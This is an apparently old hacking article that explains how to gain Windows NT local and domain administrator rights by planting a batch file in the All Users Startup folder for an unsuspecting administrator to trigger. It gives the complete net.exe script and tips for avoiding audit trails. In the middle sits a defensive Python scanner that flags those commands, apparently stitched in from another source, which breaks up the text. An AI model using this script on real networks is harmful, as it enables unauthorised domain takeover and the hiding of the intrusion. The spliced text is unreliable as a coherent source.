Hacking an NT Domain from the Desktop

by Hi_RISC

One day, not so long ago, I was sitting in my cubicle pecking away at the keyboard as I was supposed to be doing.  Then I noticed something.  The date/time on my computer was incorrect.

After a couple of "Access Denied" error messages, I gave up on trying to fix it, but sort of felt perturbed.  "Do they really think that I am that incompetent that I cannot even manage to change the time on my own machine without screwing things up?"  Needless to say, this started the ball rolling.

The work I was doing was Helpdesk phone support for a large OEM producer.  I figured myself to be reasonably intelligent as well as knowledgeable about the workings of Windows NT and Windows 95/98.  I was also beginning work on my MCSE, so I had the reference material available for any situation.

After a little reading, I decided to make myself a Local Administrator of my box, just so I could change the time when I liked, to whatever I liked.

All Windows NT administration can be done via the command line, though not many are doing it these days.  It's easy enough to create a script to add yourself to the local admin group, but how do you get the script to run, and with the proper authority?  It's easier than it may sound, but let's look at the script first.

This is my example:

@echo off
net localgroup administrators %username% /add

The method of getting this script to execute and with the proper authority is simple.  All I did was contact my own IT professional within the organization (who only needs to have administrator privileges) and informed him of my date/time issue.  He said he'd be there momentarily, so I quickly named the script LOGIN.BAT and threw it in the c:\Winnt\Profiles\All Users\Start Menu\Programs\Startup directory so that it would execute.
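Because the whole trick hinges on a batch file sitting in the All Users Startup folder, the cheapest defensive check is to look at what is in that folder before an administrator logs on interactively at a user's desk. The Python scanner below is an added example, not part of the article: it classifies the net.exe commands the article uses (account creation, Administrators and Domain Admins changes, any other group change), rates the file, and runs over a temporary stand-in for the Startup folder. The regular expressions are this editor's approximation of the net.exe syntax shown in the article, and the folder, the file names and the benign script are constructed; the suspicious sample is the article's own five-line script.

```python
"""Added example (not from the article): scan startup-folder batch files for
commands that create accounts or change privileged group membership.

The regular expressions approximate the net.exe syntax used in the article;
the demo folder, file names and the benign script are constructed.
"""
import os
import re
import tempfile

# First matching rule wins, so the specific privileged-group rules come first.
RULES = [
    ("account_created",
     re.compile(r"^\s*net\s+user\s+\S+.*\s/add\b", re.I)),
    ("domain_admins_changed",
     re.compile(r'^\s*net\s+group\s+"domain\s+admins".*\s/(add|delete)\b', re.I)),
    ("local_admins_changed",
     re.compile(r"^\s*net\s+localgroup\s+administrators\s.*\s/(add|delete)\b", re.I)),
    ("group_membership_changed",
     re.compile(r"^\s*net\s+(group|localgroup)\s.*\s/(add|delete)\b", re.I)),
]
SCRIPT_EXTENSIONS = {".bat", ".cmd"}
HIGH_RISK = {"account_created", "domain_admins_changed", "local_admins_changed"}

# The article's finished five-line script, used here as sample input.
SAMPLE_SCRIPT = """@echo off
net user %username% password /active /domain /add
net localgroup administrators %username% /add
net group "Domain Admins" %username% /add /domain
net group "Guests" %username% /delete /domain
"""
# Constructed benign script for contrast.
BENIGN_SCRIPT = "@echo off\necho Welcome to the corporate desktop\n"


def scan_script(text):
    """Return [(line_no, rule_name, stripped_line)] for every suspicious line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((no, name, line.strip()))
                break  # one classification per line
    return findings


def assess(findings):
    """'high' if an account is created or an admin group is touched,
    'medium' for any other group change, 'none' when nothing matched."""
    names = {name for _, name, _ in findings}
    if names & HIGH_RISK:
        return "high"
    return "medium" if names else "none"


def scan_startup_folder(folder):
    """Scan every .bat/.cmd file in folder and return
    {filename: (severity, findings)} for files with at least one hit."""
    report = {}
    for entry in sorted(os.listdir(folder)):
        if os.path.splitext(entry)[1].lower() not in SCRIPT_EXTENSIONS:
            continue
        with open(os.path.join(folder, entry), encoding="utf-8", errors="replace") as fh:
            findings = scan_script(fh.read())
        if findings:
            report[entry] = (assess(findings), findings)
    return report


def make_demo_folder():
    """Create a temporary stand-in for the Startup folder holding one benign
    and one suspicious script (constructed data)."""
    folder = tempfile.mkdtemp(prefix="startup_demo_")
    with open(os.path.join(folder, "WELCOME.BAT"), "w") as fh:
        fh.write(BENIGN_SCRIPT)
    with open(os.path.join(folder, "LOGIN.BAT"), "w") as fh:
        fh.write(SAMPLE_SCRIPT)
    return folder


if __name__ == "__main__":
    for name, (severity, findings) in scan_startup_folder(make_demo_folder()).items():
        print(f"{name}: {severity}")
        for no, rule, line in findings:
            print(f"  line {no} [{rule}] {line}")
```

Run against the demo folder it reports only LOGIN.BAT, rated high, with all four net lines classified; WELCOME.BAT produces no findings and is left out of the report. On a real machine the folder argument would be the All Users Startup path named in the article, and the more durable fix is to make that folder unwritable to ordinary users so the drop cannot happen in the first place.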

As he logged in, I tried to distract him a little so he wouldn't notice that a second script was running.  It worked like a charm.  I could now install and remove drivers, change the time, and even adjust the Desktop settings.  Not too much down the road, I left that organization to get some real hands-on experience with networking and the related OSes.  My Windows NT experience has grown tremendously and I realized that this gaping hole in Microsoft's security is translatable into something much more lethal (though not fully condoned).

How difficult would it be to completely hack a Windows NT domain from the inside?  Ironically, it's just as easy as hacking the Workstation.

In order to keep from getting caught, I recommend creating a dummy account so that it's not traceable to you through auditing.  If someone were to check the accounts in the Domain Admins group and your username showed, there would probably be a lot of "'splaining to do" but if, say, the Guest account or some other inconspicuous account showed, who would they blame it on?  Only themselves.

First, the script should add a user (not necessary if you're going to use the guest account):

net user %username% password /active /domain /add

This creates an account with the password "password" on the domain controller and makes it an active account (not disabled).

Next, we need to add you to the Local Administrators group just as before:

net localgroup administrators %username% /add

Finally, we take the dummy account and add it to the Domain Admins group as well as remove it from the Guests group (in case it's locked out of anything):

net group "Domain Admins" %username% /add /domain
net group "Guests" %username% /delete /domain

So in effect, we have created a nameless user account with a simple password and added it into the Local Administrator group, the domain administrator group, and removed it from the guest group.  All in all, not bad for five lines of script.

Here is the finished product:

@echo off
net user %username% password /active /domain /add
net localgroup administrators %username% /add
net group "Domain Admins" %username% /add /domain
net group "Guests" %username% /delete /domain

This makes for an excellent "sudden" attack in that it may not be uncovered for a range of days to even weeks afterward.

Being a Windows NT admin now, I would recommend that you not use the same user name twice and not use your own PC.  This activity is logged and you don't want a trail.

Happy Hacking!
